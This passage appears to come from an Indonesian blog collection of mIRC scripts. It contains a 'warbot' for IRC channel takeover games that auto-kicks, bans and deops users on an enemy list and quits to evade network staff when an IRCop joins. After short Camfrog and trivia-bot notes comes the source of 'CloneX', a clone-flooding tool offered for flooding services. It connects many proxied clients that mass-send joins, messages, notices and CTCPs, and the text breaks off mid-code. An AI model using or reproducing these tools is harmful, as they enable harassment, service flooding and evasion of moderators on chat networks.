while (%temp) {
set %woes $gettok(%foes,%temp,44)
dec %temp
if ($istok(%name,%woes,32)) && (!$istok(%ally,%woes,32)) { set %kick $addtok(%kick,%woes,44) }
}
unset %temp %woes
}
}
alias fmsg { return 4,4_ 0m|®¢ 4,4_ 0®Ã«d 4,4_ 0åñd 4,4_ 0Whitë 4,4_ }
alias setX { return 4,4_ 0m|®¢ 4,4_ 0®Ã«d 4,4_ 0åñd 4,4_ 0Whitë 4,4_ }
alias kik_msg { return $iif(%kick.msg,$setX(%kick.msg),$catX) }
alias quit_sock { sx %sock_nick quit $kmsg }
alias warbot {
if ($dialog(warbot) == $null) { dialog -m warbot warbot | vibrator warbot warbot }
}
alias f1 warbot
alias f2 { sx %sock_nick join %chan }
alias sf2 { sx %sock_nick part %chan }
alias f3 {
if (%sock_name) { echo 4 -a * Socket with nick %sock_nick still connecting | return }
set %warmodeX $true
if (%reconn) { unset %reconn | goto next }
if (%^serv == $true) %serv = $?="type irc.dal.net"
:next | if (%serv) {
if (%sock_nick) { sockopen %sock_nick %serv 6667 | echo -a 4,4- 0,4INFO 4,4- 8,8- 1,8Socket with nick 4,8 %sock_nick 1is connecting to server 12 %serv }
else { echobot ctcp Choose a nick for your socket }
}

;elseif ($$?="ketik [(:| )][port]: (e.g: swiftco.dal.net 6667) $+($crlf,Bila) port tidak ditentukan, port 6667 akan digunakan.") {
window -e @PlayGround
var %i $replace($v1,:,$chr(32)), %s $gettok(%i,1,32)
;sockopen %sock_nick %s $iif($gettok(%i,2,32),$v1,6667)
se info 4 $+ %sock_nick 7initialized connection to 11 %serv
set %serv %i
elseif (%serv) {
if (%sock_nick) { sockopen %sock_nick %serv %port }
else { se info You Must Set A Value In 4 %sock_nick }
}
else { se info No Server Is Specified }
}
alias sf3 { set %ojdeop $iif(%ojdeop,$false,$true) } | echo -a 0,4 On-Join Deop 1,8 $iif(%ojdeop,ENABLE ,DISABLE )
alias f4 { addfoes $$1 | cline 9 $iif(%chan,%chan) $$1 | echo -a 0,4 $$1 1,8 added on enemies list }
alias sf4 { set %fjdeop $iif(%fjdeop,$false,$true) } | echo -a 0,4 Fast-Rejoin Deop 1,8 $iif(%fjdeop,ENABLE ,DISABLE )
alias f5 { set %warmodeX $iif(%warmodeX,$false,$true) } | echo -a 0,4 WarMode 0,12 $iif(%warmodeX,ENABLE ,DISABLE ) | sx %sock_nick privmsg %chan : $+ 14War $iif(%warmodeX,Enable,Disable)
alias sf5 { set %onopdeop $iif(%onopdeop,$false,$true) } | echo -a 0,4 On-Op Deop 1,8 $iif(%onopdeop,ENABLE ,DISABLE )
alias f6 {
if (#$?="Enter WarChan") { %chan = $v1 | echo -act info 0,12 WarChan 0,4 $v1 }
else { echo -act info 1,15 « No WarChan Specified » }
}
alias sf6 { set %ondeopchk $iif(%ondeopchk,$false,$true) } | echo -a 0,4 On-Deop Change Nick 1,8 $iif(%ondeopchk,ENABLE ,DISABLE )
alias f7 { sx %sock_nick join %chan }
alias sf7 { set %ojban $iif(%ojban,$false,$true) } | echo -a 0,4 On-Join Ban 1,8 $iif(%ojban,ENABLE ,DISABLE )
alias f8 { unset %foes %dark %wban | echo -act info 0,4 INFO 0,12 Enemies Has Been Cleared | sx %sock_nick privmsg %chan : $+ 14Enemies Cleared }
alias sf8 { set %banlocker $iif(%banlocker,$false,$true) } | echo -a 0,4 Ban-Locker 1,8 $iif(%banlocker,ENABLE ,DISABLE )
alias f9 { set %wideban $iif(%wideban,$false,$true) | set %banlocker $iif(%banlocker,$false,$true) } | echo -a 0,4 Mode-Ban 1,8 $iif(%wideban,ENABLE ,DISABLE )
alias sf9 { sx %sock_nick nick $rn }
alias f10 { set %chk $iif(%chk,$false,$true) } | echo -a 0,4 Nick-Changer 1,8 $iif(%chk,ENABLE ,DISABLE )
alias sf10 { set %logoX $iif(%logoX,$false,$true) | set %pkmsg $iif(%pkmsg,$false,$true) | unset %pick_kmsg } | echo -a 0,4 Pick-Kick Message 1,8 $iif(%pkmsg,ENABLE ,DISABLE )
alias f11 { quit_sock } | echo -a 0,4 ALERT 1,8 Socket With Nick 4 %sock_nick 1Has Been Disconnected
on *:load: {
if ($version < 6.21) {
.echo -ac ctcp This script could not run on mIRC version $version due to
.echo -ac ctcp dialog features only supported on versions 6.21 onwards.
.echo -ac ctcp Please download the latest mIRC at www.mirc.com
.unload -rs $nopath($script) $kmsg
}
else { echo -ac info $nopath($script) $kmsg is now loaded. }
}
alias sf11 { set %antichk $iif(%antichk,$false,$true) } | echo -a 0,4 Anti-Nick Changer 1,8 $iif(%antichk,ENABLE ,DISABLE )
alias f12 { enemylistx }
alias enemylistx { echo -a 1,15 Enemies 4 $numtok(%foes,44) 1,15: 12 $sorttok(%foes,44) }
on ^1:OP:%chan:{ if ($istok(%dark,$address($opnick,2),32)) { cline 9 %chan $opnick } }

on *:unload: {
unset %pass %sock_nick %sock_user %join %jvar %sign %warmodeX %serv %port %chan %ally %trig
echo -ac info $nopath($script) $kmsg has been unloaded.
}
on *:part:#:{ if ($nick == $me) { part # } }
on *:start: { scriptset | fkeys }
alias scriptset {
set %chk $false
set %ojban $false
set %ojdeop $true
set %fjdeop $true
set %wideban $false
set %banlocker $false
set %modeplusie $false
set %invexremover $false
set %ondeopchk $false
set %onopdeop $false
set %antichk $true
set %pkmsg $false
set %logoX $true
set %join 15000
set %jvar 300
set %sign -
set %kicklogo.1 ok
set %warmodeX $true
set %trig kick.invite.mode.notice.join.nick.part.quit.303.461.471.473.474.475.477.441.401.353.367.368.346.348
set %serv swiftco.dal.net
set %port 6667
set %ally Chanserv
unset %foes | unset %dark | unset %kick | unset %wban | unset %sock_nick | unset %sock_user | unset %pass | unset %myip | unset %chan | unset %name
.identd on $rn
.fullname $fmsg
}
alias fkeys {
;echo -a
echo -a 9---------------------------------------------------------------------------------
echo -a 9- 8Just Press 4F1 8To Open Dialog Menu
echo -a 9- 8Right Click On Channel Window
echo -a 9---------------------------------------------------------------------------------
}

alias ident_sock { sx %sock_nick identify %pass }
alias addfoes { set %foes $addtok(%foes,$1,44) | set %dark $addtok(%dark,$address($1,2),32) }
alias delfoes { set %foes $remtok(%foes,$1,1,44) | set %dark $remtok(%dark,$address($1,2),1,32) }
on *:nick:{
if (%antichk == $true) {
if ($istok(%foes,$nick,44) == $true) {
set %foes $reptok(%foes,$nick,$newnick,44)
}
}

}
on !*:JOIN:#:{
if ($regex($wildsite,/ninja.staff|staff.Dalnet|dalnet|127.0.0.11|dal.net|staff.dal.net/)) {
if (!$window(ircop_alert!!)) { window -aboCk0+df @ircop_alert!! -1 -1 600 100 tahoma 18 }
aline -hp 4 @ircop_alert!! 14,1 WARNING: IRCop join on 4 $upper($chan) 1,8detected on Nick : 12 $upper($nick)
.msg %chan IRCop join on $chan detected on Nick : 4 $nick
.timerpart 1 2 part %chan im.leaving.from.this.planet...
.nick $anick
.timerchangenick 1 5 nick $+($anick,$r(10,99))
if ($sock(*,0)) {
aline -hp 4 @ircop_alert!! 0,4 Now Auto Quitting The WarBot
sockwrite -tn * quit : 13stupid fuckin` idiot staff in here
}
}
}

menu nicklist {
-
» Sock-Ctrl
.» Op: { if (%sock_nick isop $chan) { sx %sock_nick mode $chan +o $$1 } | else { sx %sock_nick cs op $chan $$1 } }
.» Deop: { if (%sock_nick isop $chan) { sx %sock_nick mode $chan -o $$1 } | else { sx %sock_nick cs deop $chan $$1 } }
.-
.$iif(%sock_nick isop $chan,» Voice) : { sx %sock_nick mode $chan -o+v $$1 $$1 }
.» Devoice: { sx %sock_nick mode $chan -v $$1 }
.-
.» Ban: { sx %sock_nick ban $chan $$1 $kmsg }
.» Ban Ip: { sx %sock_nick mode $chan +b $address($$1,2) $kmsg }
.-
.» Kick (why):{ sx %sock_nick kick $chan $$1 $$?="Reason:" }
.-
.» Slap:{ sx %sock_nick privmsg %chan : action slaps $$1 around a bit with a large trout }
-
» Add $$1:{ addfoes $$1 | sx %sock_nick kick %chan $1 $kmsg } | echo -a 14,1 $$1 14,1 Adding!!
» Del $$1:{ delfoes $$1 }
-
}
menu channel {
-
««-|[ Unrealx ]|-»»:f1
-
Join WarChan:{ sx %sock_nick join %chan }
Part WarChan:{ sx %sock_nick part %chan $kmsg }
-
Invex-Rem ( $+ $iif(%invexremover,On,Off)$+ ) :{ set %invexremover $iif(%invexremover,$false,$true) | set %modeplusie $false } | echo -a 0,4 Invex-Remover 1,8 $iif(%invexremover,ON ,OFF )
Mode +Ie ( $+ $iif(%modeplusie,On,Off) $+ ) :{ set %modeplusie $iif(%modeplusie,$false,$true) } | echo -a 0,4 Mode +Ie 1,8 $iif(%modeplusie,ON ,OFF )
-
Random Nick:{ sx %sock_nick nick $rn }
-
Change Nick:{ sx %sock_nick nick : $+ $$?="Type Your New Sock_Nick" }
Ident Pass:{ sx %sock_nick identify : $+ $$?="Type Your Sock_Nick Password" }
-
Enemies List:{ f12 }
Clear All Enemies:{ f8 }
-
WarBot Talk:{ sx %sock_nick privmsg %chan : $+ $$?="type your message here" }
-
Quit WarBot: { quit_sock }
}
alias vibrator {
var %d $1
if ($dialog(%d)) {
.dialog -v %d
var %x $dialog(%d).x, %y $dialog(%d).y, %w $calc($dialog(%d).w - 6), %h $calc($dialog(%d).h - 25), %i 1
while (%i <= 400) {
.dialog -s %d $rand($calc(%x - 10),$calc(%x + 10)) $rand($calc(%y - 10),$calc(%y + 10)) %w %h
inc %i
}
.dialog -s %d %x %y %w %h
}
}

on *:INPUT:#:{
if ($left($1,1) == x) {
if ($right($1,-1) == part) { sx %sock_nick part %chan %kmsg }
if ($right($1,-1) == join) { if %sock_nick && (%chan) { sx %sock_nick join %chan } }
if ($right($1,-1) == say) { sx %sock_nick privmsg $active : $+ $2-100 }
if ($right($1,-1) == query) { sx %sock_nick privmsg $2 : $+ $3-100 }
if ($right($1,-1) == kick) { sx %sock_nick kick %chan $2 $3 }
if ($right($1,-1) == add) { addfoes $2 | echo -a 0,4 $2 1,8 has been Added to Enemy List }
if ($right($1,-1) == del) { %dark = $remtok(%dark,$address($$2,2),32) | %foes = $remtok(%foes,$$2,44) | echo -a 14,1- 14 $+ $$2 0 $address($$2,2),32) 14,1 Delete!! }
if ($right($1,-1) == quit) { quit_sock }
if ($right($1,-1) == op) { sx %sock_nick mode # +o $2 }
if ($right($1,-1) == deop) { sx %sock_nick mode # -o $2 }
if ($right($1,-1) == vo) { sx %sock_nick mode # +v $2 }
if ($right($1,-1) == devo) { sx %sock_nick mode # -v $2 }
if ($right($1,-1) == ban) { sx %sock_nick mode # +b $2 }
if ($right($1,-1) == unban) { sx %sock_nick mode # -b $2 }
if ($right($1,-1) == clear) { unset %foes %dark %wban | echo -act info 0,4 INFO 14,1 Enemies Cleared | sx %sock_nick privmsg %chan : $+ 14,1Enemies Cleared }
if ($right($1,-1) == mode) { sx %sock_nick mode # +ntps-Mij }
}
}

--------------------------------------------------------------------

Tips biar menang main war kick pakai script Silveraldo ini:

1.Disable Opsi Fast Join Deop Supaya nilai meng-kick lebih besar daripada dikick sehingga dapat mengoptimisasi score

2.Bandwith dan Laju Koneksi harus kencang

Tips untuk mengoptimalisasi Bandwith dengan cara:

a. Open Start - All Programs - Accessories - Command Prompt
b. Type gpedit.msc terus enter
c. Setelah masuk pada Group Policy pada Computer Configuration pilih Administrator Template
d. Pilih Folder Network - Qos Packet Scheduler - Limit Reservable Bandwith
e. Pilih Opsi Enable ( di Centang ) kemudian 20% ganti dengan 0%
f. Silahkan melakukan Ping terhadap DNS anda jika terdapat ping 19-25 ms maka anda kemungkinan war kick bisa menang.

Have fun


ref: dari berbagai sumber

Command Bot di Camfrog

Bot Commands

/ver - display bot version (version.dll)
/shutdown - shut down the bot (imcontrol.dll)

Room controls
/postmsg message - post message to chat (imcontrol.dll)
/kickuser nickname - kick user from chatroom (imcontrol.dll)
/punishuser nickname - punish user in chatroom (imcontrol.dll)
/unpunishuser nickname - unpunish user (imcontrol.dll)

Trivia Game
/trvplay 0|1 - turn Trivia game on/off (trivia.dll)
/trvstart - start Trivia game (trivia.dll)
/trvstop - stop Trivia game (trivia.dll)
/trvclear - clear records (trivia.dll)

Posting messages to the room
/msgrtime 30-30000 - set messages posting interval (messenger.dll)
/msgrclear - clear message list (messenger.dll)
/msgradd message - add message to message list (messenger.dll)

Bad expressions
/bexpr 0|1 - turn bad expressions catcher on/off (badwords.dll)
/bekick - select kick for bad expressions (badwords.dll)
/bepunish - select punish for bad expressions (badwords.dll)
/bereason reason - set kick/punish reason (badwords.dll)
/becount 1-10 - set the forbidden words counter (badwords.dll)
/bewords 0|1 - select regular expressions/words mode - with “0″ it will use regular expressions, with “1″ just kick for word substring (badwords.dll)
/beclear - clear bad expressions list (badwords.dll)
/beadd expression - add expression to bad list (badwords.dll)

Whobanned plugin
These commands are working with events that happened during the bot uptime only! For example if the bot exits and is restarted all prior moderation events will be lost and you’ll need to check the logs file. All previous events can be found in the plugin logs at the server.

/whobanned nickname - check who banned nickname (whobanned.dll)
/whokicked nickname - check who kicked nickname (whobanned.dll)
/whopunished nickname - check who punished nickname (whobanned.dll)
/whounpunished nickname - check who unpunished nickname (whobanned.dll)

Bot owners control
/owners - display owners list (imcontrol.dll)
/addowner nickname - add new owner (imcontrol.dll)
/delowner nickname - delete owner (imcontrol.dll)


ref: http://pakmin.co.cc

Remote Main Kuis Game Family 100 atau Scramble IRC

remote ini mungkin sudah basi ya tapi apa salahnya mengingat kembali biar semakin tajam hehe

rumus : on 1:text:*kata kunci soalnya*:#:{ /msg $chan jawaban | /msg $chan jawaban }

example :
on 1:text:*Merk Celana dalam*:#: { /msg $chan sony | /msg $chan crocodile | /msg $chan hitachi }

bisa ditambah sendiri sesuai keperluan di kotak remote anda dan jangan lupa remote on oke degh thanks.


ref: dari berbagai sumber

Flooding Service Using CloneX Script

Iseng iseng flooding service dengan script ini cukup lumayan buat jadi thread di channel-channel.Tapi Resiko ditanggung sendiri jangan nakal ya sekedar untuk pengetahuan. Berikut ini source codenya :

--------------------------------------------------------------
Alias CloneX {
If ($Dialog(p.cloning)) { Dialog -v p.cloning }
Else { Dialog -md p.cloning p.cloning }
}
dialog p.cloning {
title " ...:: R0ni & Zoti ::... "
size -1 -1 696 560
option pixels
tab "Connection", 200, 8 8 679 543
box "Server", 8, 24 56 244 76, tab 200
text "Server:", 9, 32 78 42 16, tab 200
edit "", 10, 72 76 188 21, tab 200 autohs
text "Server Port:", 1, 32 104 66 16, tab 200
box "Nickname Settings", 34, 24 136 244 68, tab 200
radio "", 35, 32 152 12 20, tab 200
radio "Other:", 36, 32 176 52 20, tab 200
edit "", 38, 88 176 172 21, tab 200 autohs
combo 12, 100 100 160 132, tab 200 size edit drop
box "Connection Statistics", 39, 16 360 260 76, tab 200
text "Number of Clones Connected:", 40, 24 384 154 16, tab 200
text "Total amount of Connections:", 42, 24 408 154 16, tab 200
text "-", 41, 184 384 82 16, tab 200
text "-", 43, 184 408 82 16, tab 200
text "Number of Clones to Connect:", 49, 24 272 146 16, tab 200
text "Protocol to Connect through:", 215, 24 296 146 16, tab 200
text "Delay between Connections:", 390, 24 320 146 16, tab 200
combo 50, 176 272 88 180, tab 200 size drop
combo 47, 176 296 88 108, tab 200 size drop
combo 391, 176 320 88 148, tab 200 size drop
box "Connection Status", 219, 280 40 396 500, tab 200
edit "", 44, 288 56 380 445, tab 200 read multi autohs vsbar
button "Clear Status Window", 53, 288 504 379 25, tab 200
button "Connect", 48, 16 440 259 25, disable tab 200
button "Connect with Nicklist", 3000, 16 472 259 25, tab 200
button "Disconnect All", 52, 16 512 259 25, tab 200
combo 37, 48 152 216 116, tab 200 size drop
box "PreLoad Settings", 51, 16 40 260 316, tab 200
box "User Modes", 54, 24 208 244 52, tab 200
text "On connect user mode:", 57, 32 232 114 16, tab 200
edit "+id", 58, 152 228 108 21, tab 200
tab "Firewall", 201
box "Socks 4", 234, 240 40 212 500, tab 201
box "Socks 5", 235, 464 40 212 500, tab 201
box "HTTP Proxy", 236, 16 40 212 500, tab 201
text "Host/IP:", 55, 24 58 42 16, tab 201
text "Port:", 56, 24 82 26 16, tab 201
edit "", 3, 56 80 164 21, tab 201 autohs
edit "", 2, 72 56 148 21, tab 201 autohs
text "Host/IP:", 65, 248 58 42 16, tab 201
edit "", 66, 296 56 148 21, tab 201 autohs
text "Port:", 67, 248 82 26 16, tab 201
edit "", 68, 280 80 164 21, tab 201 autohs
button "Import", 6, 128 104 91 17, tab 201
button "Remove All", 244, 128 120 91 17, tab 201
button "Add", 5, 24 104 91 17, tab 201
button "Add", 70, 248 104 91 17, tab 201
button "Remove", 72, 248 120 91 17, tab 201
button "Import", 71, 352 104 91 17, tab 201
button "Remove All", 256, 352 120 91 17, tab 201
button "Remove", 7, 24 120 91 17, tab 201
text "Host/IP:", 74, 472 58 42 16, tab 201
edit "", 75, 520 56 148 21, tab 201 autohs
text "Port:", 76, 472 82 26 16, tab 201
edit "", 77, 504 80 164 21, tab 201 autohs
button "Add", 79, 472 104 91 17, tab 201
button "Remove", 81, 472 120 91 17, tab 201
button "Import", 80, 576 104 91 17, tab 201
button "Remove All", 265, 576 120 91 17, tab 201
list 78, 472 144 196 388, tab 201 size hsbar vsbar
list 69, 248 144 196 388, tab 201 size hsbar vsbar
list 4, 24 144 196 388, tab 201 size hsbar vsbar
tab "Actions", 202
box "Actions", 305, 192 40 484 276, tab 202
button "Join", 306, 200 56 67 17, disable tab 202
button "Part", 307, 200 80 67 17, disable tab 202
button "CTCP", 309, 200 232 67 17, disable tab 202
button "Message", 310, 200 136 67 17, disable tab 202
button "Notice", 311, 200 160 67 17, disable tab 202
button "Other Command", 312, 200 288 107 17, disable tab 202
edit "", 314, 272 56 84 21, disable tab 202 autohs
edit "", 316, 272 80 84 21, disable tab 202 autohs
edit "", 320, 272 232 84 21, disable tab 202 autohs
edit "", 322, 272 136 84 21, disable tab 202 autohs
edit "", 326, 272 160 84 21, disable tab 202 autohs
edit "", 329, 312 288 356 21, disable tab 202 autohs
text "Message:", 323, 360 136 50 16, tab 202
text "Message:", 327, 360 160 50 16, tab 202
edit "", 324, 416 136 252 21, disable tab 202 autohs
edit "", 328, 416 160 252 21, disable tab 202 autohs
button "Change", 330, 584 376 83 17, disable tab 202
edit "Random", 331, 584 392 84 21, disable tab 202 autohs
box "Nicks to Perform the Actions:", 332, 24 376 156 76, tab 202
edit "", 783, 416 80 252 21, disable tab 202 autohs
text "Message:", 784, 360 80 50 16, tab 202
radio "All", 333, 104 392 36 20, disable tab 202
radio "Selected", 334, 104 408 60 20, disable tab 202
radio "Group 1", 335, 32 392 60 20, disable tab 202
radio "Group 2", 336, 32 408 60 20, disable tab 202
radio "Group 3", 337, 32 424 60 20, disable tab 202
box "Nick List", 338, 16 40 172 500, tab 202
list 339, 24 56 156 316, disable tab 202 size extsel vsbar
list 373, 456 384 108 148, disable tab 202 size vsbar
list 369, 328 384 108 148, disable tab 202 size vsbar
list 351, 200 368 108 164, disable tab 202 size vsbar
button "Move to Group 1 >", 340, 24 464 155 17, disable tab 202
button "Move to Group 2 >", 341, 24 488 155 17, disable tab 202
button "Move to Group 3 >", 342, 24 512 155 17, disable tab 202
box "Group 1", 348, 192 320 124 220, tab 202
box "Group 2", 366, 320 320 124 220, tab 202
box "Group 3", 370, 448 320 124 220, tab 202
button "Remove", 349, 200 336 107 17, disable tab 202
button "Remove All", 350, 200 352 107 17, disable tab 202
button "Remove", 367, 328 336 107 17, disable tab 202
button "Remove All", 368, 328 352 107 17, disable tab 202
button "Remove", 371, 456 336 107 17, disable tab 202
button "Remove All", 372, 456 352 107 17, disable tab 202
button "Quit", 11, 200 264 67 17, disable tab 202
edit "", 13, 272 264 396 21, disable tab 202 autohs
edit "", 18, 400 232 268 21, disable tab 202 autohs
text "CTCP:", 19, 360 232 34 16, tab 202
button "Nicklist", 20, 584 472 83 17, disable tab 202
text "Channel key when Channel's +k:", 22, 360 56 162 16, tab 202
edit "", 23, 528 56 140 21, disable tab 202
button "Describe", 24, 200 184 67 17, disable tab 202
edit "", 25, 272 184 84 21, disable tab 202 autohs
text "Message:", 26, 360 184 50 16, tab 202
edit "", 27, 416 184 252 21, disable tab 202 autohs
button "Join Part", 28, 200 104 67 17, disable tab 202
edit "", 29, 272 104 84 21, disable tab 202 autohs
text "Message:", 30, 360 104 50 16, tab 202
edit "", 31, 416 104 252 21, disable tab 202 autohs
text "Change nickname using Nicklist:", 21, 584 432 90 32, tab 202
box "Nickname", 14, 576 352 100 188, tab 202
button "All 3", 15, 200 208 67 17, disable tab 202
edit "", 16, 272 208 84 21, disable tab 202 autohs
edit "", 17, 416 208 252 21, disable tab 202 autohs
text "Message:", 32, 360 208 50 16, tab 202
text "Nicklist Format: [Ident]", 33, 584 496 82 32, tab 202
check "Reply to CTCPs", 46, 576 328 92 20, tab 202
menu "File", 403
item "Quit", 476, 403, cancel
menu "Specials", 411
item "Ip-Ports", 412, 411
menu "Nick List", 413, 411
menu "Change Nick", 414, 413
item "Default List", 415, 414
item "Select List", 416, 414
menu "Safeguard Nicks", 417, 413
item "Default List", 418, 417
item "Select List", 419, 417
menu "Connect with List", 420, 413
item "Default List", 421, 420
item "Select List", 422, 420
}

On *:Dialog:p.cloning:Edit:*: {
If ($Did == 2) || ($Did == 3) { p.clon.fire.secl 2 3 5 }
If ($Did == 66) || ($Did == 68) { p.clon.fire.secl 66 68 70 }
If ($Did == 75) || ($Did == 77) { p.clon.fire.secl 75 77 79 }
If ($Did == 10) || ($Did == 12) || ($Did == 38) || ($Did == 50) { P.Cloning.conEcheck }
If ($Did == 38) { If ($len($Did($DName,38)) > 10) { P.Cloning.fal Nickname cannot exceed 10 Characters. | Did -r $DName 38 } }
If ($Did == 314) {
If (& iswm $Did($DName,$Did).Text) && ($Left($Did($DName,$Did).Text,1) == $chr(35)) Did -e $DName 306
Else Did -b $DName 306
}
If ($Did == 29) {
If (& iswm $Did($DName,$Did).Text) && ($Left($Did($DName,$Did).Text,1) == $chr(35)) Did -e $DName 28
Else Did -b $DName 28
}
If ($Did == 316) {
If (& iswm $Did($DName,$Did).Text) && ($Left($Did($DName,$Did).Text,1) == $chr(35)) { Did -e $DName 307 }
Else { Did -b $DName 307 }
}
If ($Did == 320) {
If (& iswm $Did($DName,$Did).Text) && (* iswm $Did($DName,18).Text) Did -e $DName 309
Else Did -b $DName 309
}
If ($Did == 322) || ($Did == 324) {
If (& iswm $Did($DName,322).Text) && (* iswm $Did($DName,324).Text) Did -e $DName 310
Else Did -b $DName 310
}
If ($Did == 326) || ($Did == 328) {
If (& iswm $Did($DName,326).Text) && (* iswm $Did($DName,328).Text) Did -e $DName 311
Else Did -b $DName 311
}
If ($Did == 25) || ($Did == 27) {
If (& iswm $Did($DName,25).Text) && (* iswm $Did($DName,27).Text) Did -e $DName 24
Else Did -b $DName 24
}
If ($Did == 16) || ($Did == 17) {
If (& iswm $Did($DName,16).Text) && (* iswm $Did($DName,17).Text) Did -e $DName 15
Else Did -b $DName 15
}
If ($Did == 320) || ($Did == 18) {
If (& iswm $Did($DName,320).Text) && (* iswm $Did($DName,18).Text) Did -e $DName 309
Else Did -b $DName 309
}
If ($Did == 329) {
If (* iswm $Did($DName,$Did).Text) Did -e $DName 312
Else Did -b $DName 312
}
If ($Did == 331) {
If (& iswm $Did($DName,$Did).Text) Did -e $DName 330
Else Did -b $DName 330
}
}
Alias -l P.Cloning.conEcheck {
If ($Dialog(p.cloning)) {
If (??* iswm $Did($DName,10)) && ($abs($Did($DName,12)) != 0) && ($abs($Did($DName,50)) != 0) {
If ($Did($DName,36).state == 0) { Did -e $DName 48 | Did -e $DName 421 | Did -e $DName 422 }
Elseif ($Did($DName,38)) { Did -e $DName 48 | Did -e $DName 421 | Did -e $DName 422 }
Else { If ($Did($DName,48).enabled == $True) { Did -b $DName 48 | Did -b $DName 421 | Did -b $DName 422 } }
}
Elseif ($Did($DName,48).enabled == $True) { Did -b $DName 48 | Did -b $DName 421 | Did -b $DName 422 }
}
}
Alias -l p.clon.fire.secl {
If ($Dialog(p.cloning)) {
If (??* iswm $Did($DName,$1)) && ($abs($Did($DName,$2)) != 0) && ($Did($DName,$2)) { Did -e $DName $$3 }
Elseif ($Did($DName,$$3).enabled == $True) { Did -b $DName $$3 }
}
}
Alias -l p.clon.fire.secl1 {
Var %p.clon.fire.secl1 = $Did($DName,$2) $Did($DName,$$3)
If ($Dialog(p.cloning)) && (!$Didwm($DName,$1,%p.clon.fire.secl1)) { Did -i $DName $1 $calc($Did($DName,$1).lines + 1) %p.clon.fire.secl1 }
}
Alias -l P.Cloning.fire.secl2 { If ($Dialog(p.cloning)) { Did -d $DName $1 $$Did($DName,$1).sel } }
Alias -l P.Cloning.fire.secl3 {
If ($Dialog(p.cloning)) {
Var %P.Cloning.proFile = $SFile($iif(%p.save.cloning.lstPath,%p.save.cloning.lstPath,C:\),Select,Import)
If (%P.Cloning.proFile) {
Set %p.save.cloning.lstPath $nofile(%P.Cloning.proFile)
Var %I = 1
While (%I <= $Lines(%P.Cloning.proFile)) {
Var %P.Cloning.proFile.p = $read(%P.Cloning.proFile,%I)
If ($Gettok(%P.Cloning.proFile.p,0,58) == 2) { Var %P.Cloning.proFile.p = $Gettok(%P.Cloning.proFile.p,1,58) $Gettok(%P.Cloning.proFile.p,2,58) }
If (($Gettok(%P.Cloning.proFile.p,0,32) != 2) || ($abs($Gettok(%P.Cloning.proFile.p,2,32)) == 0)) { P.Cloning.fal The Proxy File must have the Proxy and the Port in this order: one.proxy.com 8080 OR other.proxy.com:8080 | return }
If (%P.Cloning.proFile.p) && (!$Didwm($DName,$1,%P.Cloning.proFile.p)) { Did -i $DName $1 $calc($Did($DName,$1).lines + 1) %P.Cloning.proFile.p }
Inc %I
}
Unset %P.Cloning.proFile.p
}
}
}
Alias -l P.Cloning.ddnsd {
If ($Dialog(p.cloning)) {
If ($Did(p.cloning,47).Text == Socks 4) || ($Did(p.cloning,47).Text == Socks 5) {
.enable #P.Cloning.DdnsD
.dns $Did(p.cloning,10).Text
p.clon.stats -Resolving Host/Ip... $time
}
Else { P.Cloning.jj }
}
}
#P.Cloning.DdnsD off
On *:DNS: {
If ($Dialog(p.cloning)) {
Did -o p.cloning 10 1 $Iif($iaddress,$iaddress,$naddress)
.disable #P.Cloning.DdnsD
p.clon.stats -Resolved to $Iif($iaddress,$iaddress,$naddress) at $time
p.clon.stats -
P.Cloning.jj
}
Haltdef
}
#P.Cloning.DdnsD end
On *:Dialog:p.cloning:sclick:*: {
If ($Did == 53) { Did -r $DName 44 }
If ($Did == 36) { If ($Did($DName,36).state == 1) && ($Did($DName,38) == $null) { Did -b $DName 48 | Did -b $DName 421 | Did -b $DName 422 } }
If ($Did == 35) { If ($Did($DName,5).enabled == $False) { Did -e $DName 48 | Did -e $DName 421 | Did -e $DName 422 } }
If ($Did == 70) { p.clon.fire.secl1 69 66 68 }
If ($Did == 79) { p.clon.fire.secl1 78 75 77 }
If ($Did == 72) { P.Cloning.fire.secl2 69 }
If ($Did == 81) { P.Cloning.fire.secl2 78 }
If ($Did == 5) { p.clon.fire.secl1 4 2 3 }
If ($Did == 6) { P.Cloning.fire.secl3 4 }
If ($Did == 7) { P.Cloning.fire.secl2 4 }
If ($Did == 71) { P.Cloning.fire.secl3 69 }
If ($Did == 80) { P.Cloning.fire.secl3 78 }
If ($Did == 48) { Unset %P.Cloning.Nlist.conn* | P.Cloning.ddnsd }
If ($Did == 52) {
If ($Sock(p.cloning*)) { .SockWrite -nt P.Cloning.* Quit | .timerPCloning.out 1 1 .sockclose P.Cloning.* }
If ($hget(P.Cloning.a)) { hfree P.Cloning.a }
.timerP.Cloning.Recr off
P.Cloning.recr 1
Unset %P.Cloning.pn %P.Cloning.t | .timerP.Cloning.* off | p.clon.stats | P.Cloning.cmds
}
If ($Did == 339) {
If ($Did($DName,$Did).sel) { Did -e $DName 340 | Did -e $DName 341 | Did -e $DName 342 }
Else { Did -b $DName 340 | Did -b $DName 341 | Did -b $DName 342 }
}
If ($Did == 244) { Did -r $DName 4 }
If ($Did == 256) { Did -r $DName 69 }
If ($Did == 265) { Did -r $DName 78 }
If ($Did == 340) && ($Did($DName,339).sel) { P.Cloning.nick.gr.ad 351 }
If ($Did == 341) && ($Did($DName,339).sel) { P.Cloning.nick.gr.ad 369 }
If ($Did == 342) && ($Did($DName,339).sel) { P.Cloning.nick.gr.ad 373 }
If ($Did == 349) { Did -d $DName 351 $$Did($DName,351).sel }
If ($Did == 367) { Did -d $DName 369 $$Did($DName,369).sel }
If ($Did == 371) { Did -d $DName 373 $$Did($DName,373).sel }
If ($Did == 350) { Did -r $DName 351 }
If ($Did == 368) { Did -r $DName 369 }
If ($Did == 372) { Did -r $DName 373 }
If ($Did == 28) { P.Cloning.runcmd JOIN $Did($DName,29).Text | P.Cloning.runcmd PART $Did($DName,29).Text : $+ $Did($DName,31).Text }
If ($Did == 11) { P.Cloning.runcmd Quit : $+ $Did($DName,13).Text }
If ($Did == 24) { P.Cloning.runcmd PRIVMSG $Did($DName,25).Text : ACTION $Did($DName,27).Text $+ }
If ($Did == 15) {
P.Cloning.runcmd PRIVMSG $Did($DName,16).Text : $+ $Did($DName,17).Text
P.Cloning.runcmd NOTICE $Did($DName,16).Text : $+ $Did($DName,17).Text
P.Cloning.runcmd PRIVMSG $Did($DName,16).Text : ACTION $Did($DName,17).Text $+
}
If ($Did == 306) { P.Cloning.runcmd JOIN $Did($DName,314).Text $Did($DName,23).Text }
If ($Did == 307) { P.Cloning.runcmd PART $Did($DName,316).Text : $+ $Did($DName,783).Text }
If ($Did == 309) { P.Cloning.runcmd PRIVMSG $Did($DName,320).Text : $+ $chr(1) $+ $Did($DName,18).Text $+ $chr(1) }
